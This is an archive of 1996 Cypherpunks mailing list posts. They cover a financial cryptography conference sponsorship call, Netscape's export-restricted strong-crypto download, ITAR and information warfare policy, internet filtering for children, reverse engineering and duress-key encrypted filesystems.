sponsors by our self-imposed deadline of September 15th, then all checks
will be returned and we'll cancel the conference, or at least examine other
options.

Sponsors' checks should be payable, in U.S. Dollars, to "Financial
Cryptography, 1997". After we get requisite number of sponsors, the checks
will be deposited in an Anguillan bank, and the partnership running the
conference and workshop will operate under Anguillan law.

For the time being, I'm the net.contact for particulars, if you know anyone
who's interested in helping us sponsor this event. Julie Rackliffe will
handle most of the actual contact with the sponsors after we're through
this first "expression of interest" phase.

Once Ray gets his conference committee assembled and they've finished
writing one, look for a Call for Papers in all the usual lists and
newsgroups. Once Ian has assembled his team of instructors, look for
information on the workshop and its contents from him in the same kinds of
places.

I'll announce when we have the requisite sponsorship as soon as we get the
sponsor list filled. Some time after that announcement, Vince Cate will be
putting together a website on Anguilla which will not only offer
information about the conference, but also a way to register, and hopefully
pay for :-), your conference tickets. With a stiff tailwind, we might be
able to arrange travel and hotel reservations too, or at least point you to
web-savvy travel people who can help you.


So, if you, or any one you know, is interested in being a sponsor for this
event, please let me know. I think you'll be pleasantly surprised by our
sponsorship pricing. We think it's well within the signing authority of
most of the senior people who read this, and should fit quite reasonably
into the promotion budget of any firm who wants to compete in the financial
cryptography business, or any business it affects, as these kinds of
markets begin to take off.

Well, that's it. Here's hoping you'll join us in Anguilla. Then you, too,
will know what *you're* doing the last week in February!



Cheers,
Bob Hettinga
FC97



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe+r7PgyLN8bw6ZVAQH6mAP+PINf7JSZzUj5+wnvb4v6kbl2q4r1mrbm
BAF5fBTk3vCYT+Kljm7sFbFptq5HQP0kU7xqVUkILQ/Gc2wSWPXzhHAaKNq90tct
pJzw/cVAISZyBO+BNqHVJEQHFJEyo93jmuEzKUhainULQMX1dLnglV1PD7m754t0
d7VmPf1pi64=
=883q
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 19:49:38 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EEEA3F.5015@netscape.com>
Message-ID: <v03007604ae15857b1319@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:57 AM -0700 7/19/96, Peter D. Junger wrote:
>Jeff Weinstein writes:
>
>: Adam Back wrote:
>: > Presumably as this latest netscape beta is freely distributable, once
>: > it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.
>:
>:   Just a minor nit.  No netscape software is freely distributable.
>: The license agreement does not allow people who download it
>: to redistribute it.
>
>But--to nitpick at the nit--nothing in the license agreement that I
>can find forbids one from distributing it to others who are not
>foreign persons and are not outside the United States.

It's a copyright work. There is no need to be explicit--redistribution of
copyright intellectual property (except for fair use excerpts) is an
infringement without explicit permission of the copyright owner, isn't it?
Next you'll be telling us that one can Xerox best-sellers without
permission and send them to Patagonia unless there's an explicit sale
prohibition against it.

Tthe license terms would have to allow redistribution explicitly for any
flavor of it to be non-infringing--they don't have to prohibit some flavors
specifically, yes?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 20 Jul 1996 22:25:25 +0800
To: cypherpunks@toad.com
Subject: Netscape patch 40 bit -> 128 bit?
Message-ID: <199607191045.LAA00321@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone with access to both the 40 bit and 128 bit version of the
latest netscape beta considered doing a binary diff on the binaries to
see how much of the code is different?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Sat, 20 Jul 1996 20:05:16 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <v03007609ae15974a5c94@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


Arun you are lost..

>particularly since you are far more likely to use this weaponry in a rage
> against a loved one than against  someone breaking down your door.

Thats plain HCI statistic crap, DONT YOU BELIVE IT, those numbers are based
on drug dealers killing other drug dealers.. read the real FBI numbers,
they are on the net.

Anyways the real reason that the "more likely" argument bothers me  is that
its like saying that Crypto is more likely to be used by criminals than law
abiding citzens.
>
>I wonder about that -- between Tweedledee Clinton and Tweedledum
>Dole, does it matter whether you vote or not?

bad attitude. thats the reason we have Her Klinton to begin with,, apathy

> The system seems to make sure that before you even get to a
>position where someone can seriously vote for you, you've already
>sold your soul.

there is some truth to that


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:48:20 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <ae143914000210044473@[205.199.118.202]>
Message-ID: <v03007605ae158803ab26@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 AM -0700 7/19/96, Mike Duvos wrote:

<Long argument that children should be exposed to every idea, omitted>

This is simply incorrect. It is a supportable advocacy for most adults, but
children's minds tend to be like sponges--everything they take in (up until
a certain age) is thought to be true, interesting, worth experimenting
with, based on authority, etc. Read Piaget.

What is more, a parent can't watch them every second while they're on the
net, nor will they ask all the questions they should about certain material
they see. I'd no more permit young kids to view gay or bestial or porno
sites on the net than I'd let them view propaganda for how good pigs taste
(unsupervised), if I were an orthodox Jew.

When they've passed the developmental stage (I rely on the experts in this
field for that determination) where they have independent critical
judgement and the security to exercise it, THEN I would open up their
horizons.

I speak as a father who has raised four children who turned out to be
independent beings to successful adulthood and families of their own, not
as a theoretician.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gregory Ellison <gregorye@microsoft.com>
Date: Sat, 20 Jul 1996 13:11:55 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Inventor of radio...
Message-ID: <c=US%a=_%p=msft%l=RED-13-MSG-960719190200Z-64142@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday, July 19, 1996 7:14 AM, Jim Choate wrote:

>> I would like to correct a misconception about who is credited with the
>> invention of radio. Nikola Tesla has held the credit for the creation since
>> the resolution of the original lawsuit in the mid-80's.

I've heard this decision referred to many times but have been unable to
locate any specifics.  Can anyone provide a pointer?

-- Gregory

<gregorye@microsoft.com>
"Opinions expressed herein are entirely my own and not the opinions of
my employer."
My PGP key is on the keyservers
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 20 Jul 1996 04:54:14 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: The risks of information warfare
Message-ID: <AE152A80-FD945B@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


I would like to put forth the assertion that "society", of late, has become
exceptionally poor at judging relative risk.  I think this is due in large
part to the sensationalism of the media (although this is not an entirely
new phenomena - "remember the Maine").  I will cite a few examples:

	1.  Radon causes 25% of all lung cancer.  Of course every study but one
shows no link between radon and lung cancer.  Still, Americans spend
billions testing and reducing the "threat".

	2.  Second hand smoke kills.  Probably, but the only statistical link was
found by picking and choosing which studies to use.  And the freedoms of
millions of Americans are dramatically restricted based on this premise.

	3.  Terrorism is a big threat to the "national security".  Of course more
people are killed in the bathtub than by terrorists, but that is beside the
point.

My reason for bringing these up is that I think much of the "information
warfare" 5th horseman is overblown hype - in the same category as 1-3
above.  Of course, many security professionals will disagree, because it is
in their best interests to do so - their level of funding depends on it.  

Sure, there have been break-ins and some loss of $$ (of course that is what
insurance companies are for).  I have seen nothing, to date, that would
justify massive increases in government power over the private sector; this
of course, has never stopped them before.  The desire to "do something"
appears to infect every politician, fortunately our system has checks and
balances to limit the ability for them to "do something" - because more
often than not it is the wrong "something"!  Unfortunately, these checks
and balances have been seriously eroded over the past 60 or so years.  It
is now much more necessary to actively oppose such idiocy as the FDA
regulating tobacco or the govt imposing "policy" over the entire
information infrastructure.  

It is hard to "buck the tide", but those of us who are skeptical of
government "solutions" to "problems" that may or may not exist must
actively oppose them.

	Clay  

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Jul 1996 16:04:00 +0800
To: cypherpunks@toad.com
Subject: take the pledge
Message-ID: <199607191606.MAA04690@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Look, folks, we all know that 99% of what David Sternlight posts is
garbage. Why don't we all pledge not to answer any of his posts, and
then he'll go away. If necessary, someone can be appointed to post a
weekly "the views expressed by David are junk and we are deliberately
not replying to them directly" message.

David has plenty of places to argue with the wind. We don't need to
add this one.

I'd like to ask people to publically pledge that they will not reply
to David's messages. This is such a pledge.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:30:52 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007601ae14f5fa1d3d@[192.187.162.15]>
Message-ID: <v03007606ae158acd52ca@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 AM -0700 7/19/96, Jeff Barber wrote:
>Yeah, right.  You clearly chose not to address the requirements of
>international company networks in your argument.  You admit that such
>companies have international networks, and that you knew it.  It was
>obviously relevant and you could have and should have addressed it.
>The fact that you chose not to speaks to your own lack of integrity.
>To gain the upper hand in the argument is clearly your supreme objective;
>any point that doesn't fit the argument is simply not addressed.

As usual, when someone calls names it is a tip-off that his argument is bogus.

1. Each country can defend its domestic infrastructure without having to
defend the international infrastructure and the international
infrastructure will pretty much take care of itself. Multinationals should
defend their branches on the territory of the host countries and within
their rules, not from the US.

2. The presenting issue here is information warfare against the US.

What is more what you say is false. I did say that there were exceptions to
ITAR for some US companies, which permit strong crypto to be used in their
overseas operations. What is more, for many months now State has permitted
US Cits to take strong crypto out of the country for personal use, if they
agree to some elementary safeguards.

Your comment is yet another example of the juvenile argument ("juvenile" in
the sense that one sees it a lot in young children whose logical
sophistication hasn't yet developed) that if something isn't perfect it
shouldn't be done at all.

Rest omitted. I'm not going to take any more time with someone who lards
his prose with deliberate personal offense and the questioning of motives.
Plonk!

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 20 Jul 1996 21:47:02 +0800
To: cypherpunks@toad.com
Subject: Re: Mail-order Ph.D.'s
In-Reply-To: <250aRD171w165w@bwalk.dm.com>
Message-ID: <199607191710.MAA30328@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> David Lesher <wb8foz@nrk.com> writes:
> > We will NOW get treated to UnProfessor's SternFUD's entire life history.
> >
> > How he went & designed the first rockets, then gave the idea to
> > Goddard. Then he went to England and invented tea. Next he came
> > back & was a personal advisor for Tricky Dick. Later, he discovered
> > the oil in Alaska. In the middle he invented the concept of
> > money....
> 
> He also invented the radio, but Marconi+Popov stole the credit from him.
> And he's the founder of public-key cryptography.
> Oh - he also invented Ethernet and TCP/IP.

Do you mean Dr. John M. Grubor, the man who created both Internet and
Usenet, right?  He's brilliant.

> 
> :-)
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:45:59 +0800
To: Cerridwyn Llewyellyn <cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <2.2.32.19960719095559.00692920@gonzo.wolfenet.com>
Message-ID: <v03007607ae158e081567@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:55 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:

>I think we underestimate childrens' ability to decide
>for themselves what is right and wrong,

I think your comments, in the context of this discussion, are less than
fully informed. This is a matter that has been given extensive and serious
scientific study over the years, independently of any specific moral or
"civil liberties" issues. Read Piaget, for example.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sat, 20 Jul 1996 20:38:25 +0800
To: paquin@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EFCCCC.B13@netscape.com>
Message-ID: <199607191914.MAA04018@niobe.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> My very personal opinion: I loathe giving out my phone number
> to anonymous corporate entities.  I do it from time to time, but
> never without a bristle.  I would prefer if we weren't asking
> for it, but I'm engaged in an opitimization exercise, or you
> might look at it as minimization of evil.  Whatever.

	What's the big deal here? I gave netscape my work number, my
work address when I downloaded the us netscape. Give them some number
that isn't private.

	sheesh. i criticized netscape for not doing the
export-controlled download in the past, and now they are doing
it. they deserve to be congratulated. They're doing good things for
the state of security on the net.

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Sat, 20 Jul 1996 09:45:02 +0800
To: jim@ACM.ORG
Subject: Re: Netscrape download
In-Reply-To: <199607191425.HAA16887@mycroft.rand.org>
Message-ID: <199607191915.MAA00310@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks. Others have confirmed the BSDI and Windows 95 version, so
I guess they're all the same.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Sat, 20 Jul 1996 05:04:01 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-daw
Message-ID: <TCPSMTP.16.7.19.12.15.48.2780269260.1198625@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:hallam@ai.mit.edu to Harka <=-

 In> If you want to own guns then you should accept the fact that you risk
 In> having your head blown off in the middle of the night by a SWAT team.
 In> Just as the car has introduced the risk of being killed in a trafic
 In> accident the gun has introduced new risks. If society dosen't like the
 In> risks then it can opt to ban the technology. 


 Except that getting killed in a traffic accident IS an accident (mostly :)) while having black clad Fed's storming into your house was _consciously_ decided by them, because THEY have a problem with YOUR guns (?!)...

 Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Sat, 20 Jul 1996 15:39:52 +0800
To: cypherpunks@toad.com
Subject: Re: MSNBC and cookies
Message-ID: <TCPSMTP.16.7.19.12.16.4.2780269260.1198626@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:tcmay@got.net to Harka <=-

 In> patrons, the Web Awareness Program tracks user interests at Web sites.

 In> The WAP has already allowed the FBI and other intelligence agencies to
 In> check up on several people who appeared to have an unusual interest in
 In> the TWA 800 case.

 In> (Don't spend too much time in certain sites, friends.)


Or be there 'anonymized'... (http://www.anonymizer.com)

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:08:26 +0800
To: cypherpunks@toad.com
Subject: Re: ABC News on internet telephony
In-Reply-To: <199607191718.NAA04083@unix.asb.com>
Message-ID: <v03007608ae15903c998c@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM -0700 7/19/96, Deranged Mutant wrote:
>ISPs have functioned better using flat monthly rates, and the biggies are like
>AT&T are going in the same direction for internet access.  I don't
>see this as being 'counter-intuitive' at all.

I said counter-intuitive to the way we stereotype them. We stereotype the
phone companies as greedily pursuing metered rates and distance-sensitive
ones at that. Every so often we see a horror story that they're about to
charge per packet, or put in a modem tax, or some such. History supports
such fears.

> The costs to the
>ISPs and telcos aren't really based on where you call or how long you
>are on anymore.

I don't have the data to know if that's generally true, but I'll take your
word for it for the moment. Can you post or e-mail me something definitive?

>
>Big questions are how the main hubs for the internet are maintained
>(esp. when some of the big telcos maintain them... a conflict of
>interest, perhaps).  Will fees become too much that smaller ISPs are
>put out of business, or that we'll start seeing ISPs merge?  (Remember
>when there were mainly local cable companies?)

Count on it. But I speculate the demise of smaller ISP's will come at least
in part in another way--the capital base of the big telcos means that they
can offer more reliable service, fewer busy signals, better customer
service, and more rapid introduction of advanced technologies AT SCALE as
they grow. But isn't that the way markets are supposed to work?

David

>
>On 18 Jul 96 at 11:03, David Sternlight wrote:
>
>[..]
>> This is the rankest speculation on my part, but could some of the bigger,
>> smarter phone company cum internet providers have done some serious
>> analysis and concluded that we're moving away from distance-based rates for
>> voice calls. Might they even have examined where we'll be in the next ten
>> years (with ADSL, etc.) and decided that the network technology and simple
>> market economics makes fixed charges per "line" more profitable to them
>> than metered usage? Maybe this is wishful thinking on my part, but some of
>> the bigger actors are starting to behave in a surprisingly
>> counter-intuitive (based on the way we stereotype them) fashion on this
>> topic.
>
>---
>No-frills sig.
>Befriend my mail filter by sending a message with the subject "send help"
>Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
>        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
>Send a message with the subject "send pgp-key" for a copy of my key.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:34:59 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive  order
In-Reply-To: <2.2.32.19960719133458.00830ef0@panix.com>
Message-ID: <v03007609ae1592351066@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:34 AM -0700 7/19/96, Duncan Frissell wrote:
>David Sternlight writes:
>
>> Here's the problem in a nutshell: Everyone who has looked at our systems,
>> from Cliff Stoll
>
>A *famous* security expert.
>
>>on to blue ribbon scientific commissions,
>
>The last of which recommended that crypto be entirely deregulated.

We're not reading from the same page. This discussion is about information
warfare and the robustness of US financial, information, control, and power
infrastructures, not ITAR. Could you be kind enough to check the Subject,
read Gorelick's testimony, and perhaps even (dare I suggest it) read the
discussion prior to your post?

>
>> Serious studies have shown that the kinds of protections to make the
>> systems we depend on robust against determined and malicious attackers (say
>> a terrorist government, or one bent on doing a lot of damage in retaliation
>> for one of our policies they don't like), have costs beyond the capability
>> of individual private sector actors.
>
>Defense is cheaper than attack in encryption because it is easier to make
>coherent information incoherent (see Usenet) than it is to make incoherent
>information coherent.

Again you are off-topic and non-responsive.

>
>> In such a case, where public benefits from government action greatly exceed
>> public (taxpayer) costs, and the private sector cannot (or will not) act
>> unaided, the classical basis for government action in the interests of the
>> citizenry exists. It's the economist's "lighthouse" argument.
>
>But since the Internet and the WANs and LANs that you are talking about are
>all "private value-added networks," the benefits of enhanced security a
>fully captured by the users of those networks and there is no "public goods"
>problems.  (BTW, there were private lighthouses too.)

Again you are off-topic and non-responsive.

>
>Note too that major money center banks disagree with you.  There was a
>recent article about the fact that they are not reporting computer
>intrusions and just fixing the problems themselves.  They don't seem
>interested in official security "help" with all the disadvantages (publicity
>and security leaks) that it brings.

Again you are off-topic. We're talking about information warfare threats of
the sort that bring entire systems and infrastructures crashing down.

But thanks for responding. I share your concerns. I feel your pain. Vote
for me in '93. :-)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 20 Jul 1996 20:07:27 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
Message-ID: <v02120d08ae159250ae12@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:04 7/18/96, David Sternlight wrote:

>Serious studies have shown that the kinds of protections to make the
>systems we depend on robust against determined and malicious attackers (say
>a terrorist government, or one bent on doing a lot of damage in retaliation
>for one of our policies they don't like), have costs beyond the capability
>of individual private sector actors. Your friendly neighborhood ISP, for
>instance, probably can't affort the iron belt and steel suspenders needed
>to make his system and its connectivity sabotage-proof, and so on. Even
>cheap but clever solutions involving encryption in such systems require
>standards and common practices across many institutions.

However, the neighorhood IPS doesn't need the kind of defenses required for
the powergrid and other crucial systems. The systems that do require such
heightend security are typically run by parties that can afford such
security. If they choose not to implement them, then it stands to reason
that their threat evaluation does not deem it necessary. Let market forces
govern, lest we spend money on countermeasures for inflated threats.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianh@u041.oh.vp.com (Brian Hills)
Date: Sat, 20 Jul 1996 05:50:18 +0800
To: cypherpunks@toad.com
Subject: VRML
Message-ID: <m0uhIg8-0002RPC@u041.oh.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

Does anybody know of a mailing-list for VRML?

I have tried www-VRML@wired.com but there is nothing, least not
returned.

Any help and/or direction would be appreciated.

Thanks in Advance,

brianh@u041.oh.vp.com

UNTIL WE MEET AGAIN :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Sat, 20 Jul 1996 21:39:24 +0800
To: jti@i-manila.com.ph>
Subject: Re: Reverse Engineer
Message-ID: <199607191647.MAA30629@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>> What do you mean by "reverse engineer?" I have heard this word several
>> times especially in the world of hacking, but... can someone tell me
>> what it really meant?

>Interesting question.  
>Hmmm...
>
>I would answer this question for you but then I would have to kill 
>you.

Well, I don't have to be subject to such childishness.

Reverse engineering code is like decompiling it.  Starting with the
compiled code, you can translate it backwards (to some degree) and
see how it works.  It's not as easy as taking a compiled program and
ending up with the original C code, but if it's worth enough to you
you -can- end up with the same information.

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 21:50:53 +0800
To: cypherpunks@toad.com
Subject: Subject: Re: Netscape download requirements
Message-ID: <v0300760dae15983c7aa8@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


>
>At 1:47 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:
>
>>
>>>I'd bet on the first.  Why screw with this?  We worked hard
>>>to make this possible and you want to ruin it.  Sheesh.
>>
>>Because freedom doesn't come in degrees, it's all or nothing.
>

Wrong. Society has long made a distinction between liberty and license, and
"freedom" is a definitional and even societal-situational thing that keeps
advancing. Check out history. Read some Supreme Court decisions of the more
thoughtful kind.

>
>>
>>>"I hate the government so I'll blow up a federal building
>>>and then the FBI will get more money and attention and
>>>power and, um, that'll show 'em, er, ah....."
>>
>>Exporting crypto-systems and killing people is comparing apples
>>and hand grenades.  Please come up with a relevant analogy.
>

It IS relevant in the underlying principles it illustrates. That the
details aren't of the same magnitude is irrelevant. Didn't you learn
"reductio ad absurdum" in school?

>
>>
>>1)  Please don't chastise individuals who take direct action and use
>>civil disobediance as a measure to change bad laws and policies (ie by
>>making your companies software available internationally).  When
>>done on a mass scale, the long-term benefits FAR outweigh the short
>>term consequences.  While you as a corporation find it much more
>>difficult to take such actions, as they would most likely ruin your
>>corporation, individuals acting in this capacity cannot be ruined quite
>>so readily.
>

It is ludicrous for some cypherpunks to try to compare their "cause" with
freeing the slaves or overthrowing a tyrannical and abusive dictator. In
fact it is romantic fantasy. Not every prosecution is of Jean Valjean; not
every arrest for speeding is the destruction of freedom as we know it. Not
every theoretical consequence is a current abuse. "Trust everyone, but
always cut the cards" is a better guide for living in a democratic society
than "distrust everyone and insist on all or nothing".
>

Essentially, one who opposes or deliberately sabotages Netscape's
compromise with full ITAR deregulation is a fascist in that he is trying to
force his will on those of his fellow citizens who want to download the
secure US version in the US, and deny _them_ _their_ rights.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 20 Jul 1996 15:40:17 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007605ae158803ab26@[192.187.162.15]>
Message-ID: <199607191957.MAA03907@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight <david@sternlight.com> writes:

 > This is simply incorrect. It is a supportable advocacy for
 > most adults, but children's minds tend to be like
 > sponges--everything they take in (up until a certain age) is
 > thought to be true, interesting, worth experimenting with,
 > based on authority, etc. Read Piaget.

Piaget was very good at "proving" how fundamentally different the
minds of children were from those of adults, and at constructing
elaborate webs of complex terminology and doctrine to support his
notions.

Unfortunately, his experiments suffered from obvious flaws.  I
recall one in which he trained a child to relate the terms "more"
and "less" to whether the same amount of fluid was poured into a
taller or shorter container.  Piaget concluded that this
demonstrated that children have no quantitative skills.  Others
had a less flattering description of the research, and realized
that all Piaget had accomplished was to teach his subjects
incorrect meanings for a few common words.  Similar defects can
be found is most of his other constructs, and better designed
experiments do not demonstrate the effects he claimed.

 > What is more, a parent can't watch them every second while
 > they're on the net, nor will they ask all the questions they
 > should about certain material they see. I'd no more permit
 > young kids to view gay or bestial or porno sites on the net
 > than I'd let them view propaganda for how good pigs taste
 > (unsupervised), if I were an orthodox Jew.

Again, we are applying a standard to the Net which has never been
applied to libraries.  Any orthodox Jewish child can read all he
or she wants in a library about the wonders of pig-eating,
without any possibility of parental supervision or disclosure of
their un-Jewish interests.

But it is now being advocated that on the Net, no child has a
right to view even a syllable of any information their parents do
not want them to see.  While gay or bestial sex is frequently the
excuse for such antics, it is clear that parents will be using
this new technology to impose a level of control over their
childrens' minds which has heretofore never been possible.  This
should worry us all.

 > When they've passed the developmental stage (I rely on the
 > experts in this field for that determination) where they
 > have independent critical judgement and the security to
 > exercise it, THEN I would open up their horizons.

Generally, very young children do not have the neural wiring in
place to suspend emotional reactions to imagery based on
intellectual considerations. Seeing an picture of someone being
hurt in a movie causes them the same emotional pain as seeing
someone hurt in real life, even though they may know perfectly
well that the former image is fictional in nature.

Almost all children develop this important critical faculty by
the age of 12, by which point, they manage to only be sickened by
the evening news, and not by the latest "Nightmare on Elm Street"
sequel.

While limiting the "horizons" of persons in their middle to late
teens is often justified by arguments about developmental stages,
the truth is that it is simply an attempt by their keepers to
control how they think and to what views, mostly political and
social in nature, they are exposed to.

 > I speak as a father who has raised four children who turned
 > out to be independent beings to successful adulthood and
 > families of their own, not as a theoretician.

Do they troll on Usenet too? :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 20 Jul 1996 21:24:55 +0800
To: Adam Back <aba@atlas.ex.ac.uk>
Subject: Re: Opiated file systems
Message-ID: <199607191718.NAA04087@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 at 11:01, Adam Back wrote:

> For plausibility it would probably be best if very few people used the
> duress key feature.

And how can you guarantee that?  Also: an attacker doesn't care about 
what percentage of (other) users use duress feature of not.  His 
concern is whether you use it.

Note that you'd have to be careful of what you say and do over email 
in the clear (or encrypted to someone cooperating with an attacker): 
if you post an excerpt of source code or maybe somehting like 
Edupage, or if you save mail, there might be reason enough for the 
attacker to expect to see some of that on your encrypted fs after 
he's rubber-hosed your key from you.  If he doesn't, and he knows you 
have a possibility of using the duress-key feature...

Oh yeah. Psychology is a good way of determining the likelihood of 
using a duress system.  

With the extra work and overhead of a duress system, you're better 
off using stego on some gifs or graphics files.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 20 Jul 1996 21:40:21 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Opiated file systems
Message-ID: <199607191718.NAA04076@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 at 22:48, Adam Back wrote:
[..]
> The whole system should be designed to withstand scrutiny as to
> whether or not there is a duress file system on any given disk, on the
> assumption that the opponent as full access to the source.
> 
> ie. the attacker can not tell without the hidden file system key (if
> one exists) whether the unused space on your drive is really just
> that: unused space filled with garbage, or whether it is in fact
> another encrytped filesystem.

There has to be a way to tell the system that the sectors are used 
when not the drive isn't mounted and the filesystem isn't active.

> They might be suspicious, but I don't think they would be able to
> claim you were in comptempt of court, if you provide the 1st key and
> claim there is no other key: the software has support for either 1
> or 2 filesystems.

